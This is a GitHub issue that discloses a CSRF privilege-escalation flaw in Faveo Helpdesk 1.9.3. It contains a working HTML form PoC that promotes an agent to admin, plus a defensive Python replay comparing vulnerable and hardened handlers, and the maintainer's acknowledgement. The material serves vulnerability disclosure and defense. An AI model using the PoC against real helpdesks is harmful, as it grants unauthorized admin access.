
CSRF Privilege Escalation (Manipulation of Role Agent to Admin) Vulnerability on Faveo version Community 1.9.3 #446

Closed
rungga opened this issue Apr 5, 2017 · 3 comments

@rungga

commented Apr 5, 2017

I. Background:
Faveo Helpdesk is an open source ticketing system built on the Laravel framework. The word Faveo is derived from Latin and means "to be favourable", which truly highlights the vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater to the needs of startups and SMEs, empowering them with a state of the art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client queries diligently is all the difference between retaining or losing a long lasting relationship.

II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Faveo has these roles:

  • user (cannot access the backend)
  • agent (can access the backend, but limited)
  • admin (has full access to the backend)

III. Exploit:
CSRF Target is: “/public/rolechangeadmin/USER_ID”

user id = 11 (role is agent)

We have low privilege as “agent” to access the application, and then want to change to the admin role.

  • Make our sample CSRF script (rolechange.html):

```html
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://192.168.228.186/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
      <input type="hidden" name="group" value="1" />
      <input type="hidden" name="primary_department" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

  • Before running “rolechange.html”, please log in to your account as agent and then run your HTML script.
  • Yeaaah, now user id 11 has admin privilege ^_^

Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

--> I attach our screenshot and script CSRF:

1 record users

2 record users

3 agent cannot access admin

4 execute html script

5 role changed successfully

6 user id 11 become admin role

csrf-faveo-agent-to-admin.txt
livedemo.txt
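To make the failure mode concrete from the defender's side, the following Python is an added example; it is not part of this issue, of the PoC, or of the Faveo code base. It replays the scenario in the report against two constructed handlers for the same role-change endpoint: one that applies the state change to any authenticated POST (the behaviour the report describes), and one that adds the two checks a practitioner would want, a per-session synchronizer token compared in constant time (the mechanism Laravel's VerifyCsrfToken middleware provides, which the maintainer says was removed from the testing build) plus an authorization check that only an admin may change roles. The in-memory user table, the `Session` class, the `_token` field name and the meaning of `group == "1"` as the admin role are assumptions chosen to mirror the hidden fields in the PoC form.

```python
"""Constructed replay of the missing CSRF and authorization checks described above.

Assumptions (not taken from the Faveo code base): an in-memory user table, a
session object that carries one synchronizer token, a hidden field named
`_token`, and a `group` value of "1" meaning the admin role.
"""
import hmac
import secrets


def reset_users():
    """Constructed user table: user 11 is the low-privilege agent from the report."""
    return {
        1: {"name": "site-admin", "role": "admin"},
        11: {"name": "agent-11", "role": "agent"},
    }


class Session:
    """Stand-in for the server-side session: one random token per session."""

    def __init__(self, user_id):
        self.user_id = user_id
        self.csrf_token = secrets.token_urlsafe(32)


def render_role_form(session):
    """Fields the legitimate admin page would embed (Laravel's @csrf emits the hidden _token)."""
    return {"_token": session.csrf_token, "group": "1", "primary_department": "3"}


def forged_role_form():
    """Fields the attacker's rolechange.html from the report posts: no _token at all."""
    return {"group": "1", "primary_department": "3"}


def change_role_vulnerable(users, session, target_user_id, form):
    """The behaviour the report describes: any authenticated POST is honoured,
    with neither a token check nor a check of the caller's own role."""
    users[target_user_id]["role"] = "admin" if form.get("group") == "1" else "agent"
    return 200


def change_role_hardened(users, session, target_user_id, form):
    """Same endpoint with a synchronizer-token check (constant-time compare, so a
    mismatch leaks nothing about the token) and an authorization check."""
    supplied = form.get("_token", "")
    if not hmac.compare_digest(supplied, session.csrf_token):
        return 419  # Laravel's status for a CSRF token mismatch
    if users[session.user_id]["role"] != "admin":
        return 403  # an agent must not be able to change roles, token or not
    users[target_user_id]["role"] = "admin" if form.get("group") == "1" else "agent"
    return 200


def replay_report():
    """Runs the report's scenario against both handlers; returns (status, resulting role) per case."""
    # Vulnerable build: agent 11 is logged in and the forged form is posted in that session.
    users = reset_users()
    agent_session = Session(user_id=11)
    vuln = (change_role_vulnerable(users, agent_session, 11, forged_role_form()), users[11]["role"])

    # Hardened build: the same forged request fails the token check before any state change.
    users = reset_users()
    agent_session = Session(user_id=11)
    forged = (change_role_hardened(users, agent_session, 11, forged_role_form()), users[11]["role"])

    # Hardened build: an agent who submits the real form with a valid token still gets 403.
    agent_with_token = (
        change_role_hardened(users, agent_session, 11, render_role_form(agent_session)),
        users[11]["role"],
    )

    # Hardened build: a real admin using the rendered form still succeeds.
    admin_session = Session(user_id=1)
    legit = (change_role_hardened(users, admin_session, 11, render_role_form(admin_session)), users[11]["role"])

    return {
        "vulnerable": vuln,
        "hardened_forged": forged,
        "hardened_agent_with_token": agent_with_token,
        "hardened_legit": legit,
    }


if __name__ == "__main__":
    for name, outcome in replay_report().items():
        print(f"{name}: status={outcome[0]} role_of_user_11={outcome[1]}")
```

The two checks are independent on purpose: the token stops a request forged from another origin, while the role check stops an agent from promoting themselves even with a perfectly valid token, which is the half of the report's title (agent to admin) that a CSRF token alone does not address.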

@vijaysebastian

Contributor

commented Apr 6, 2017

@rungga Firstly, thanks for notifying us of this major issue. We are checking the CSRF token, but by mistake we have released a testing copy. While testing we had removed some filters (middleware). We will make the release soon.

@rungga

Author

commented Apr 6, 2017

You're welcome.

The Faveo helpdesk application is good software for supporting the ITSM process. I would be happy to help test the new version of Faveo.

Don't hesitate to contact me ^_^

@vijaysebastian

Contributor

commented Apr 6, 2017

We are so happy to grow the Faveo community! That is our vision too.
